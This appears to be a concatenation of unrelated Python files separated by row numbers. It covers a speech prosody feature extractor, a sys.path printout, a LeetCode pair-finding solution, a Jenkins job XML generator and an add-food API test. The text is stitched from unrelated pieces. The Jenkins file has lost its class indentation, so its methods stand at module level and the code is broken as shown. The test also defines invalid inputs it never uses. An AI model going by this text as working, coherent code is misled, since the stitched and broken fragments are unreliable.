"""
import matplotlib.pyplot as plt
import numpy as np
from tqdm import tqdm
import torch
import pandas as pd
import pysptk
from matplotlib import cm
from scipy.io.wavfile import read
import os
import sys
# Resolve the directory containing this file so that sibling project modules
# can be imported regardless of the current working directory.
PATH = os.path.dirname(os.path.realpath(__file__))
sys.path.append(PATH+'/../')
sys.path.append(PATH)
plt.rcParams["font.family"] = "Times New Roman"
from prosody_functions import V_UV, F0feat, energy_cont_segm, polyf0, energy_feat, dur_seg, duration_feat, get_energy_segment
from script_mananger import script_manager
from utils import save_dict_kaldimat, get_dict
import praat.praat_functions as praat_functions
class Prosody:
    """
    Compute prosody features from continuous speech based on duration, fundamental frequency and energy.
    Static or dynamic matrices can be computed:
    Static matrix is formed with 103 features and include

    1-6 F0-contour: Avg., Std., Max., Min., Skewness, Kurtosis

    7-12 Tilt of a linear estimation of F0 for each voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    13-18 MSE of a linear estimation of F0 for each voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    19-24 F0 on the first voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    25-30 F0 on the last voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    31-34 energy-contour for voiced segments: Avg., Std., Skewness, Kurtosis

    35-38 Tilt of a linear estimation of energy contour for V segments: Avg., Std., Skewness, Kurtosis

    39-42 MSE of a linear estimation of energy contour for V segment: Avg., Std., Skewness, Kurtosis

    43-48 energy on the first voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    49-54 energy on the last voiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    55-58 energy-contour for unvoiced segments: Avg., Std., Skewness, Kurtosis

    59-62 Tilt of a linear estimation of energy contour for U segments: Avg., Std., Skewness, Kurtosis

    63-66 MSE of a linear estimation of energy contour for U segments: Avg., Std., Skewness, Kurtosis

    67-72 energy on the first unvoiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    73-78 energy on the last unvoiced segment: Avg., Std., Max., Min., Skewness, Kurtosis

    79 Voiced rate: Number of voiced segments per second

    80-85 Duration of Voiced: Avg., Std., Max., Min., Skewness, Kurtosis

    86-91 Duration of Unvoiced: Avg., Std., Max., Min., Skewness, Kurtosis

    92-97 Duration of Pauses: Avg., Std., Max., Min., Skewness, Kurtosis

    98-103 Duration ratios: Pause/(Voiced+Unvoiced), Pause/Unvoiced, Unvoiced/(Voiced+Unvoiced),Voiced/(Voiced+Unvoiced), Voiced/Puase, Unvoiced/Pause

    Dynamic matrix is formed with 13 features computed for each voiced segment and contains

    1-6. Coefficients of 5-degree Lagrange polynomial to model F0 contour

    7-12. Coefficients of 5-degree Lagrange polynomial to model energy contour

    13. Duration of the voiced segment

    Dynamic prosody features are based on
    Najim Dehak, "Modeling Prosodic Features With Joint Factor Analysis for Speaker Verification", 2007

    Script is called as follows

    >>> python prosody.py <file_or_folder_audio> <file_features> <static (true or false)> <plots (true or false)> <format (csv, txt, npy, kaldi, torch)>

    Examples command line:

    >>> python Prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesAst.txt" "true" "true" "txt"
    >>> python Prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesUst.csv" "true" "true" "csv"
    >>> python prosody.py "../audios/001_ddk1_PCGITA.wav" "prosodyfeaturesUdyn.pt" "false" "true" "torch"
    >>> python Prosody.py "../audios/" "prosodyfeaturesst.txt" "true" "false" "txt"
    >>> python Prosody.py "../audios/" "prosodyfeaturesst.csv" "true" "false" "csv"
    >>> python Prosody.py "../audios/" "prosodyfeaturesdyn.pt" "false" "false" "torch"
    >>> python Prosody.py "../audios/" "prosodyfeaturesdyn.csv" "false" "false" "csv"

    Examples directly in Python

    >>> prosody=Prosody()
    >>> file_audio="../audios/001_ddk1_PCGITA.wav"
    >>> features1=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="npy")
    >>> features2=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="dataframe")
    >>> features3=prosody.extract_features_file(file_audio, static=False, plots=True, fmt="torch")
    >>> prosody.extract_features_file(file_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test")

    >>> path_audio="../audios/"
    >>> features1=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="npy")
    >>> features2=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="csv")
    >>> features3=prosody.extract_features_path(path_audio, static=False, plots=True, fmt="torch")
    >>> prosody.extract_features_path(path_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test.ark")
    """
    def __init__(self):
        # Analysis configuration.
        self.pitch_method = "rapt"  # 'rapt' (pysptk) or 'praat' pitch tracker.
        self.size_frame = 0.02      # Frame size in seconds.
        self.step = 0.01            # Frame step in seconds.
        self.thr_len = 0.14         # Threshold (seconds) above which an unvoiced segment counts as a pause.
        self.minf0 = 60             # Minimum F0 in Hz for the pitch tracker.
        self.maxf0 = 350            # Maximum F0 in Hz for the pitch tracker.
        self.voice_bias = -0.2      # Voicing decision bias passed to rapt.
        self.P = 5                  # Polynomial degree used for the dynamic contour fits.
        # Column names for the static feature matrix (F0, voiced energy,
        # unvoiced energy, duration groups — concatenated into head_st below).
        self.namefeatf0 = ["F0avg", "F0std", "F0max", "F0min",
                           "F0skew", "F0kurt", "F0tiltavg", "F0mseavg",
                           "F0tiltstd", "F0msestd", "F0tiltmax", "F0msemax",
                           "F0tiltmin", "F0msemin", "F0tiltskw", "F0mseskw",
                           "F0tiltku", "F0mseku", "1F0mean", "1F0std",
                           "1F0max", "1F0min", "1F0skw", "1F0ku", "lastF0avg",
                           "lastF0std", "lastF0max", "lastF0min", "lastF0skw", "lastF0ku"]
        self.namefeatEv = ["avgEvoiced", "stdEvoiced", "skwEvoiced", "kurtosisEvoiced",
                           "avgtiltEvoiced", "stdtiltEvoiced", "skwtiltEvoiced", "kurtosistiltEvoiced",
                           "avgmseEvoiced", "stdmseEvoiced", "skwmseEvoiced", "kurtosismseEvoiced",
                           "avg1Evoiced", "std1Evoiced", "max1Evoiced", "min1Evoiced", "skw1Evoiced",
                           "kurtosis1Evoiced", "avglastEvoiced", "stdlastEvoiced", "maxlastEvoiced",
                           "minlastEvoiced", "skwlastEvoiced", "kurtosislastEvoiced"]
        self.namefeatEu = ["avgEunvoiced", "stdEunvoiced", "skwEunvoiced", "kurtosisEunvoiced",
                           "avgtiltEunvoiced", "stdtiltEunvoiced", "skwtiltEunvoiced", "kurtosistiltEunvoiced",
                           "avgmseEunvoiced", "stdmseEunvoiced", "skwmseEunvoiced", "kurtosismseEunvoiced",
                           "avg1Eunvoiced", "std1Eunvoiced", "max1Eunvoiced", "min1Eunvoiced", "skw1Eunvoiced",
                           "kurtosis1Eunvoiced", "avglastEunvoiced", "stdlastEunvoiced", "maxlastEunvoiced",
                           "minlastEunvoiced", "skwlastEunvoiced", "kurtosislastEunvoiced"]
        self.namefeatdur = ["Vrate", "avgdurvoiced", "stddurvoiced", "skwdurvoiced", "kurtosisdurvoiced", "maxdurvoiced", "mindurvoiced",
                            "avgdurunvoiced", "stddurunvoiced", "skwdurunvoiced", "kurtosisdurunvoiced", "maxdurunvoiced", "mindurunvoiced",
                            "avgdurpause", "stddurpause", "skwdurpause", "kurtosisdurpause", "maxdurpause", "mindurpause",
                            "PVU", "PU", "UVU", "VVU", "VP", "UP"]
        self.head_st = self.namefeatf0+self.namefeatEv+self.namefeatEu+self.namefeatdur
        # Column names for the dynamic feature matrix: polynomial coefficients
        # of the F0 and energy contours plus the segment duration.
        self.namef0d = ["f0coef"+str(i) for i in range(6)]
        self.nameEd = ["Ecoef"+str(i) for i in range(6)]
        self.head_dyn = self.namef0d+self.nameEd+["Voiced duration"]

    def plot_pros(self, data_audio, fs, F0, segmentsV, segmentsU, F0_features):
        """Plots of the prosody features

        :param data_audio: speech signal.
        :param fs: sampling frequency
        :param F0: contour of the fundamental frequency
        :param segmentsV: list with the voiced segments
        :param segmentsU: list with the unvoiced segments
        :param F0_features: vector with f0-based features
        :returns: plots of the prosody features.
        """
        # Top panel: waveform with real, average and estimated F0 overlaid.
        plt.figure(figsize=(6, 6))
        plt.subplot(211)
        ax1 = plt.gca()
        t = np.arange(len(data_audio))/float(fs)
        colors = cm.get_cmap('Accent', 5)
        ax1.plot(t, data_audio, 'k', label="speech signal",
                 alpha=0.5, color=colors.colors[4])
        ax1.set_ylabel('Amplitude', fontsize=12)
        ax1.set_xlabel('Time (s)', fontsize=12)
        ax1.set_xlim([0, t[-1]])
        ax2 = ax1.twinx()
        fsp = len(F0)/t[-1]
        t2 = np.arange(len(F0))/fsp
        ax2.plot(
            t2, F0, color=colors.colors[0], linewidth=2, label=r"Real $F_0$", alpha=0.5)
        ax2.set_ylabel(r'$F_0$ (Hz)', color=colors.colors[0], fontsize=12)
        ax2.tick_params('y', colors=colors.colors[0])
        # Mean/SD computed over voiced frames only (F0 != 0).
        p0 = np.where(F0 != 0)[0]
        f0avg = np.nanmean(np.where(F0 != 0, F0, np.nan))
        f0std = np.std(F0[p0])
        ax2.plot([t2[0], t2[-1]], [f0avg, f0avg],
                 color=colors.colors[2], label=r"Avg. $F_0$")
        ax2.fill_between([t2[0], t2[-1]], y1=[f0avg+f0std, f0avg+f0std], y2=[f0avg-f0std,
                         f0avg-f0std], color=colors.colors[2], alpha=0.2, label=r"Avg. $F_0\pm$ SD.")
        F0rec = polyf0(F0)
        ax2.plot(t2, F0rec, label=r"estimated $F_0$",
                 c=colors.colors[1], linewidth=2.0)
        plt.text(t2[2], np.max(F0)-5, r"$F_0$ SD.=" +
                 str(np.round(f0std, 1))+" Hz")
        plt.text(t2[2], np.max(F0)-20, r"$F_0$ tilt.=" +
                 str(np.round(F0_features[6], 1))+" Hz")
        plt.legend(ncol=2, loc=8)
        # Bottom panel: log-energy contour of the whole signal.
        plt.subplot(212)
        size_frameS = 0.02*float(fs)
        size_stepS = 0.01*float(fs)
        logE = energy_cont_segm([data_audio], size_frameS, size_stepS)
        Esp = len(logE[0])/t[-1]
        t2 = np.arange(len(logE[0]))/float(Esp)
        plt.plot(t2, logE[0], color='k', linewidth=2.0)
        plt.xlabel('Time (s)', fontsize=12)
        plt.ylabel('Energy (dB)', fontsize=12)
        plt.xlim([0, t[-1]])
        plt.grid(True)
        plt.tight_layout()
        plt.show()
        # Second figure: mean energy per voiced / unvoiced segment.
        plt.figure(figsize=(6, 3))
        Ev = energy_cont_segm(segmentsV, size_frameS, size_stepS)
        Eu = energy_cont_segm(segmentsU, size_frameS, size_stepS)
        plt.plot([np.mean(Ev[j])
                  for j in range(len(Ev))], label="Voiced energy")
        plt.plot([np.mean(Eu[j])
                  for j in range(len(Eu))], label="Unvoiced energy")
        plt.xlabel("Number of segments")
        plt.ylabel("Energy (dB)")
        plt.legend()
        plt.grid()
        plt.tight_layout()
        plt.show()

    def extract_static_features(self, audio, plots, fmt):
        """Compute the 103 static features and convert them to *fmt*
        (npy/txt -> ndarray, dataframe/csv -> DataFrame, torch -> tensor)."""
        features = self.prosody_static(audio, plots)
        if fmt in ("npy", "txt"):
            return features
        elif fmt in ("dataframe", "csv"):
            df = {}
            for e, k in enumerate(self.head_st):
                df[k] = [features[e]]
            return pd.DataFrame(df)
        elif fmt == "torch":
            feat_t = torch.from_numpy(features)
            return feat_t
        elif fmt == "kaldi":
            raise ValueError("Kaldi is only supported for dynamic features")
        raise ValueError("format" + fmt+" is not supported")

    def extract_dynamic_features(self, audio, fmt, kaldi_file=""):
        """Compute the per-voiced-segment dynamic features and convert them
        to *fmt*; for "kaldi" the features are written to *kaldi_file*."""
        features = self.prosody_dynamic(audio)
        if fmt in ("npy", "txt"):
            return features
        if fmt in ("dataframe", "csv"):
            df = {}
            for e, k in enumerate(self.head_dyn):
                df[k] = features[:, e]
            return pd.DataFrame(df)
        if fmt == "torch":
            feat_t = torch.from_numpy(features)
            return feat_t
        if fmt == "kaldi":
            # Key the kaldi matrix by the audio file name.
            name_all = audio.split('/')
            dictX = {name_all[-1]: features}
            save_dict_kaldimat(dictX, kaldi_file)
        else:
            raise ValueError("format" + fmt+" is not supported")

    def extract_features_file(self, audio, static=True, plots=False, fmt="npy", kaldi_file=""):
        """Extract the prosody features from an audio file

        :param audio: .wav audio file.
        :param static: whether to compute and return statistic functionals over the feature matrix, or return the feature matrix computed over frames
        :param plots: timeshift to extract the features
        :param fmt: format to return the features (npy, dataframe, torch, kaldi)
        :param kaldi_file: file to store kaldi features, only valid when fmt=="kaldi"
        :returns: features computed from the audio file.

        >>> prosody=Prosody()
        >>> file_audio="../audios/001_ddk1_PCGITA.wav"
        >>> features1=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="npy")
        >>> features2=prosody.extract_features_file(file_audio, static=True, plots=True, fmt="dataframe")
        >>> features3=prosody.extract_features_file(file_audio, static=False, plots=True, fmt="torch")
        >>> prosody.extract_features_file(file_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test")
        """
        if static:
            return self.extract_static_features(audio, plots, fmt)
        else:
            return self.extract_dynamic_features(audio, fmt, kaldi_file)

    def prosody_static(self, audio, plots):
        """Extract the static prosody features from an audio file

        :param audio: .wav audio file.
        :param plots: timeshift to extract the features
        :returns: array with the 103 prosody features

        >>> prosody=Prosody()
        >>> file_audio="../audios/001_ddk1_PCGITA.wav"
        >>> features=prosody.prosody_static(file_audio, plots=True)
        """
        fs, data_audio = read(audio)
        # Downmix multi-channel audio, then remove DC and peak-normalise.
        if len(data_audio.shape) > 1:
            data_audio = data_audio.mean(1)
        data_audio = data_audio-np.mean(data_audio)
        data_audio = data_audio/float(np.max(np.abs(data_audio)))
        size_frameS = self.size_frame*float(fs)
        size_stepS = self.step*float(fs)
        thr_len_pause = self.thr_len*float(fs)  # pause threshold in samples
        if self.pitch_method == 'praat':
            # Praat writes its output to temp files, which are decoded and removed.
            name_audio = audio.split('/')
            temp_uuid = 'prosody'+name_audio[-1][0:-4]
            if not os.path.exists(PATH+'/../tempfiles/'):
                os.makedirs(PATH+'/../tempfiles/')
            temp_filename_f0 = PATH+'/../tempfiles/tempF0'+temp_uuid+'.txt'
            temp_filename_vuv = PATH+'/../tempfiles/tempVUV'+temp_uuid+'.txt'
            praat_functions.praat_vuv(audio, temp_filename_f0, temp_filename_vuv,
                                      time_stepF0=self.step, minf0=self.minf0, maxf0=self.maxf0)
            F0, _ = praat_functions.decodeF0(
                temp_filename_f0, len(data_audio)/float(fs), self.step)
            os.remove(temp_filename_f0)
            os.remove(temp_filename_vuv)
        elif self.pitch_method == 'rapt':
            # rapt expects 16-bit-range samples.
            data_audiof = np.asarray(data_audio*(2**15), dtype=np.float32)
            F0 = pysptk.sptk.rapt(data_audiof, fs, int(
                size_stepS), min=self.minf0, max=self.maxf0, voice_bias=self.voice_bias, otype='f0')
        # Split the signal into voiced and unvoiced segments; long unvoiced
        # segments are classified as pauses.
        segmentsV = V_UV(F0, data_audio, type_seg="Voiced",
                         size_stepS=size_stepS)
        segmentsUP = V_UV(F0, data_audio, type_seg="Unvoiced",
                          size_stepS=size_stepS)
        segmentsP = []
        segmentsU = []
        for k in range(len(segmentsUP)):
            if (len(segmentsUP[k]) > thr_len_pause):
                segmentsP.append(segmentsUP[k])
            else:
                segmentsU.append(segmentsUP[k])
        F0_features = F0feat(F0)
        energy_featuresV = energy_feat(segmentsV, fs, size_frameS, size_stepS)
        energy_featuresU = energy_feat(segmentsU, fs, size_frameS, size_stepS)
        duration_features = duration_feat(
            segmentsV, segmentsU, segmentsP, data_audio, fs)
        if plots:
            self.plot_pros(data_audio, fs, F0, segmentsV,
                           segmentsU, F0_features)
        features = np.hstack(
            (F0_features, energy_featuresV, energy_featuresU, duration_features))
        return features

    def prosody_dynamic(self, audio):
        """Extract the dynamic prosody features from an audio file

        :param audio: .wav audio file.
        :returns: array (N,13) with the prosody features extracted from an audio file.  N= number of voiced segments

        >>> prosody=Prosody()
        >>> file_audio="../audios/001_ddk1_PCGITA.wav"
        >>> features=prosody.prosody_dynamic(file_audio)
        """
        fs, data_audio = read(audio)
        # Downmix multi-channel audio, then remove DC and peak-normalise.
        if len(data_audio.shape) > 1:
            data_audio = data_audio.mean(1)
        data_audio = data_audio-np.mean(data_audio)
        data_audio = data_audio/float(np.max(np.abs(data_audio)))
        size_frameS = self.size_frame*float(fs)
        size_stepS = self.step*float(fs)
        overlap = size_stepS/size_frameS
        if self.pitch_method == 'praat':
            name_audio = audio.split('/')
            temp_uuid = 'prosody'+name_audio[-1][0:-4]
            if not os.path.exists(PATH+'/../tempfiles/'):
                os.makedirs(PATH+'/../tempfiles/')
            temp_filename_f0 = PATH+'/../tempfiles/tempF0'+temp_uuid+'.txt'
            temp_filename_vuv = PATH+'/../tempfiles/tempVUV'+temp_uuid+'.txt'
            praat_functions.praat_vuv(audio, temp_filename_f0, temp_filename_vuv,
                                      time_stepF0=self.step, minf0=self.minf0, maxf0=self.maxf0)
            F0, _ = praat_functions.decodeF0(
                temp_filename_f0, len(data_audio)/float(fs), self.step)
            os.remove(temp_filename_f0)
            os.remove(temp_filename_vuv)
        elif self.pitch_method == 'rapt':
            data_audiof = np.asarray(data_audio*(2**15), dtype=np.float32)
            F0 = pysptk.sptk.rapt(data_audiof, fs, int(
                size_stepS), min=self.minf0, max=self.maxf0, voice_bias=self.voice_bias, otype='f0')
        # Voiced frames are those with non-zero F0; gaps in the frame indices
        # (diff > 1) mark the boundaries between voiced segments.
        pitchON = np.where(F0 != 0)[0]
        dchange = np.diff(pitchON)
        change = np.where(dchange > 1)[0]
        iniV = pitchON[0]
        featvec = []
        iniVoiced = (pitchON[0]*size_stepS)+size_stepS
        seg_voiced = []
        f0v = []
        Ev = []
        for indx in change:
            finV = pitchON[indx]+1
            finVoiced = (pitchON[indx]*size_stepS)+size_stepS
            VoicedSeg = data_audio[int(iniVoiced):int(finVoiced)]
            temp = F0[iniV:finV]
            tempvec = []
            # Only keep segments at least one analysis frame long.
            if len(VoicedSeg) > int(size_frameS):
                seg_voiced.append(VoicedSeg)
                dur = len(VoicedSeg)/float(fs)
                # Degree-P polynomial fit of the F0 contour.
                x = np.arange(0, len(temp))
                z = np.poly1d(np.polyfit(x, temp, self.P))
                f0v.append(temp)
                tempvec.extend(z.coeffs)
                # Degree-P polynomial fit of the energy contour.
                temp = get_energy_segment(size_frameS, size_stepS, VoicedSeg, overlap)
                Ev.append(temp)
                x = np.arange(0, len(temp))
                z = np.poly1d(np.polyfit(x, temp, self.P))
                tempvec.extend(z.coeffs)
                tempvec.append(dur)
                featvec.append(tempvec)
            iniV = pitchON[indx+1]
            iniVoiced = (pitchON[indx+1]*size_stepS)+size_stepS
        # Add the last voiced segment
        finV = (pitchON[len(pitchON)-1])
        finVoiced = (pitchON[len(pitchON)-1]*size_stepS)+size_stepS
        VoicedSeg = data_audio[int(iniVoiced):int(finVoiced)]
        temp = F0[iniV:finV]
        tempvec = []
        if len(VoicedSeg) > int(size_frameS):
            # Compute duration
            dur = len(VoicedSeg)/float(fs)
            x = np.arange(0, len(temp))
            z = np.poly1d(np.polyfit(x, temp, self.P))
            tempvec.extend(z.coeffs)
            # Energy coefficients
            temp = get_energy_segment(size_frameS, size_stepS, VoicedSeg, overlap)
            x = np.arange(0, len(temp))
            z = np.poly1d(np.polyfit(x, temp, self.P))
            tempvec.extend(z.coeffs)
            tempvec.append(dur)
            # Compute duration
            featvec.append(tempvec)
        return np.asarray(featvec)

    def extract_features_path(self, path_audio, static=True, plots=False, fmt="npy", kaldi_file=""):
        """Extract the prosody features for audios inside a path

        :param path_audio: directory with (.wav) audio files inside, sampled at 16 kHz
        :param static: whether to compute and return statistic functionals over the feature matrix, or return the feature matrix computed over frames
        :param plots: timeshift to extract the features
        :param fmt: format to return the features (npy, dataframe, torch, kaldi)
        :param kaldi_file: file to store kaldifeatures, only valid when fmt=="kaldi"
        :returns: features computed from the audio file.

        >>> prosody=Prosody()
        >>> path_audio="../audios/"
        >>> features1=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="npy")
        >>> features2=prosody.extract_features_path(path_audio, static=True, plots=False, fmt="csv")
        >>> features3=prosody.extract_features_path(path_audio, static=False, plots=True, fmt="torch")
        >>> prosody.extract_features_path(path_audio, static=False, plots=False, fmt="kaldi", kaldi_file="./test.ark")
        """
        hf = os.listdir(path_audio)
        hf.sort()
        pbar = tqdm(range(len(hf)))
        ids = []
        Features = []
        for j in pbar:
            pbar.set_description("Processing %s" % hf[j])
            audio_file = path_audio+hf[j]
            feat = self.extract_features_file(
                audio_file, static=static, plots=plots, fmt="npy")
            Features.append(feat)
            if static:
                # One row per file.
                ids.append(hf[j])
            else:
                # One row per voiced segment: repeat the file name per row.
                ids.append(np.repeat(hf[j], feat.shape[0]))
        Features = np.vstack(Features)
        ids = np.hstack(ids)
        return self.save_features(Features, ids, fmt, static, kaldi_file)

    def save_features(self, Features, ids, fmt, static, kaldi_file):
        """Convert the stacked feature matrix to *fmt*; "kaldi" writes to
        *kaldi_file* and is only valid for dynamic features."""
        if fmt in ("npy", "txt"):
            return Features
        elif fmt in ("dataframe", "csv"):
            df = {}
            if static:
                head = self.head_st
            else:
                head = self.head_dyn
            for e, k in enumerate(head):
                df[k] = Features[:, e]
            df["id"] = ids
            return pd.DataFrame(df)
        elif fmt == "torch":
            return torch.from_numpy(Features)
        elif fmt == "kaldi":
            if static:
                raise ValueError(
                    "Kaldi is only supported for dynamic features")
            dictX = get_dict(Features, ids)
            save_dict_kaldimat(dictX, kaldi_file)
        else:
            raise ValueError(fmt+" is not supported")
if __name__ == "__main__":
    # Expect exactly 5 user arguments (6 entries in argv including the
    # script name); otherwise print usage and exit.
    if len(sys.argv) != 6:
        print("python prosody.py <file_or_folder_audio> <file_features> <static (true, false)> <plots (true, false)> <format (csv, txt, npy, kaldi, torch)>")
        sys.exit()
    prosody = Prosody()
    script_manager(sys.argv, prosody)
|
import sys

# Diagnostic helper: dump the interpreter's module search path.
print(f"Path ==> {sys.path}")
|
15,697 | 5fafeac43bd9fd6b98b7482eb63d0ab26a830117 | '''
-*- coding: utf-8 -*-
@Author : Simon Zhang
@Time : 2019/11/22 0:15
@Software: PyCharm
@File : 117.py
'''
# 给出一个函数 f(x, y) 和一个目标结果 z,请你计算方程 f(x,y) == z 所有可能的正整数 数对 x 和 y。
#
# 给定函数是严格单调的,也就是说:
#
# f(x, y) < f(x + 1, y)
# f(x, y) < f(x, y + 1)
# 函数接口定义如下:
#
# interface CustomFunction {
# public:
# // Returns positive integer f(x, y) for any given positive integer x and y.
# int f(int x, int y);
# };
# 如果你想自定义测试,你可以输入整数 function_id 和一个目标结果 z 作为输入,其中 function_id 表示一个隐藏函数列表中的一个函数编号,题目只会告诉你列表中的 2 个函数。
#
# 你可以将满足条件的 结果数对 按任意顺序返回。
#
#
#
# 示例 1:
#
# 输入:function_id = 1, z = 5
# 输出:[[1,4],[2,3],[3,2],[4,1]]
# 解释:function_id = 1 表示 f(x, y) = x + y
# 示例 2:
#
# 输入:function_id = 2, z = 5
# 输出:[[1,5],[5,1]]
# 解释:function_id = 2 表示 f(x, y) = x * y
#
#
# 提示:
#
# 1 <= function_id <= 9
# 1 <= z <= 100
# 题目保证 f(x, y) == z 的解处于 1 <= x, y <= 1000 的范围内。
# 在 1 <= x, y <= 1000 的前提下,题目保证 f(x, y) 是一个 32 位有符号整数。
class Solution:
    """LeetCode 1237: find all positive integer pairs (x, y) with
    f(x, y) == z for a hidden function f that is strictly increasing in
    both arguments."""

    def findSolution(self, customfunction: 'CustomFunction', z: int) -> 'List[List[int]]':
        """Return all [x, y] with f(x, y) == z, x ascending.

        Two-pointer sweep: x walks up from 1 while y only ever walks down —
        because f is strictly increasing in both arguments, once
        f(x, y) <= z a larger y can never be needed for any larger x.
        Runs in O(x_max + y_max) calls to f.

        The annotations are quoted (string forward references) because
        neither CustomFunction nor typing.List is imported in this module;
        unquoted names would raise NameError at definition time.
        """
        pairs = []
        y, g = z, customfunction.f
        for x in range(1, z + 1):
            while y:
                d = g(x, y) - z
                if d <= 0:
                    if not d:  # exact hit: f(x, y) == z
                        pairs.append([x, y])
                    break  # f(x, y) < z: any smaller y is smaller still
                y -= 1
        return pairs
|
15,698 | 66b5a4c574772c0e24ded26fb7304ef73766e74d | from argparse import Namespace
from sys import argv as argument_vector, exit as system_exit
from lxml.etree import Element
from python_utility.custom_argument_parser import CustomArgumentParser
from jenkins_job_manager.freestyle_project_builder.freestyle_settings \
import FreestyleSettings
from jenkins_job_manager.freestyle_project_builder.freestyle_project_builder \
import FreestyleProjectBuilder
from jenkins_job_manager.freestyle_project_builder.publisher_settings \
import PublisherSettings
from jenkins_job_manager.lxml_helper import serialize_element
from jenkins_job_manager.project_builder import ProjectBuilder
from jenkins_job_manager.repository_settings import RepositorySettings
from jenkins_job_manager.workflow_project_builder.workflow_project_builder \
import WorkflowProjectBuilder
class JenkinsJobManager:
FREESTYLE_JOB_TYPE = 'freestyle'
WORKFLOW_JOB_TYPE = 'workflow'
def __init__(self, arguments: list):
self.parsed_arguments = self._create_parser().parse_args(arguments)
@staticmethod
def create_publisher_settings(
parsed_arguments: Namespace
) -> PublisherSettings:
publisher_settings = PublisherSettings()
publisher_settings.junit = parsed_arguments.junit
publisher_settings.hypertext_report = parsed_arguments.hypertext_report
publisher_settings.checkstyle = parsed_arguments.checkstyle
publisher_settings.jacoco = parsed_arguments.jacoco
publisher_settings.recipients = parsed_arguments.recipients
return publisher_settings
@staticmethod
def main():
system_exit(JenkinsJobManager(argument_vector[1:]).run())
def run(self) -> int:
print('<?xml version="1.1" encoding="UTF-8"?>')
print(self.generate_serialized_xml().strip())
return 0
@staticmethod
def get_job_types() -> list:
return [
JenkinsJobManager.FREESTYLE_JOB_TYPE,
JenkinsJobManager.WORKFLOW_JOB_TYPE
]
@staticmethod
def _add_required_arguments(parser: CustomArgumentParser) -> None:
required_group = parser.add_argument_group('required named arguments')
required_group.add_argument(
'--locator',
help='locator to the repository to check out on Jenkins',
required=True,
)
@staticmethod
def _add_publisher_arguments(parser: CustomArgumentParser) -> None:
parser.add_argument(
'--junit',
help='Set the JUnit output to publish.',
default='',
)
parser.add_argument(
'--hypertext-report',
help='Set the hypertext report to publish.',
default='',
)
parser.add_argument(
'--checkstyle',
help='Set the checkstyle output to publish.',
default='',
)
parser.add_argument(
'--jacoco',
help='Enable publishing JaCoCo output.',
action='store_true',
)
@staticmethod
def _create_parser() -> CustomArgumentParser:
parser = CustomArgumentParser(
description='Generate a configuration for a Jenkins job.'
)
JenkinsJobManager._add_required_arguments(parser=parser)
parser.add_argument(
'--type',
help='Repository type.',
choices=RepositorySettings.get_repository_types(),
)
parser.add_argument(
'--build-command',
help='Set the build command.',
default='',
)
JenkinsJobManager._add_publisher_arguments(parser=parser)
parser.add_argument(
'--description',
help='Set the job description.',
default='',
)
parser.add_argument(
'--labels',
help='Set the job labels.',
default='',
)
parser.add_argument(
'--recipients',
help='Set mail recipients in case of build failure, '
'whitespace-separated.',
default='',
)
parser.add_argument(
'--job-type',
help='Job type.',
choices=JenkinsJobManager.get_job_types(),
default=JenkinsJobManager.FREESTYLE_JOB_TYPE,
)
return parser
def generate_xml(self) -> Element:
    """Build the job configuration XML tree for the parsed arguments.

    Returns the root Element produced by the builder matching the
    requested job type.

    Raises RuntimeError when the job type is not one of the known types.
    """
    builder: ProjectBuilder
    repository_settings = RepositorySettings(
        repository_type=self.parsed_arguments.type,
        repository_locator=self.parsed_arguments.locator,
    )
    job_type = self.parsed_arguments.job_type
    # BUGFIX: compare with `==`, not `is`. The job type is a string that
    # argparse hands back from user input; identity with the class
    # constant relies on CPython string interning and is not guaranteed
    # even when the values are equal.
    if job_type == JenkinsJobManager.FREESTYLE_JOB_TYPE:
        builder = FreestyleProjectBuilder(
            repository_settings=repository_settings,
            publisher_settings=JenkinsJobManager.create_publisher_settings(
                parsed_arguments=self.parsed_arguments
            ),
            freestyle_settings=FreestyleSettings(
                build_command=self.parsed_arguments.build_command,
                labels=self.parsed_arguments.labels,
            ),
        )
    elif job_type == JenkinsJobManager.WORKFLOW_JOB_TYPE:
        builder = WorkflowProjectBuilder(
            repository_settings=repository_settings,
        )
    else:
        raise RuntimeError(
            'Unexpected job type: ' + job_type
        )
    builder.description = self.parsed_arguments.description
    return builder.build()
def generate_serialized_xml(self) -> str:
    """Return the job configuration XML rendered as a string."""
    xml_root = self.generate_xml()
    return serialize_element(xml_root)
|
"""A module for testing the add food feature."""
import unittest
from tests.base_test import BaseTestCase
from app.views.menu_blueprint import order_obj
class TestCase(BaseTestCase):
    """Tests for the add-food feature of the menu blueprint."""

    def test_empty_menu_list(self):
        """The menu starts out with no foods."""
        self.assertEqual(len(order_obj.get_all_foods()), 0)

    def test_add_food(self):
        """Only admins may add food, and malformed payloads are rejected."""
        food = {
            "food_name": "fish",
            "food_price": 22
        }
        # invalid key
        invalid_food_obj = {
            "food": "fish",
            "food_price": 22
        }
        # invalid food_price data type
        invalid_food_input = {
            "food_name": "fish",
            "food_price": "gg"
        }
        # invalid (non-string) food name
        invalid_food_input1 = {
            "food_name": 2,
            "food_price": "gg"
        }
        # empty food name
        invalid_food_input2 = {
            "food_name": "",
            "food_price": "gg"
        }

        self.register_user(self.new_user)

        # Before promotion, a regular user must not be able to add food.
        login_response = self.login_user(self.resgistered_user)
        token = str(login_response.json["token"])
        forbidden = self.post_food(food, token)
        self.assertEqual(forbidden.status_code, 401)

        # After promotion to admin, adding a valid food succeeds.
        self.make_admin("mos")
        login_response = self.login_user(self.resgistered_user)
        token = str(login_response.json["token"])
        created = self.post_food(food, token)
        self.assertEqual(created.status_code, 201)

        # Adding the same food again is a conflict.
        duplicate = self.post_food(food, token)
        self.assertEqual(duplicate.status_code, 409)

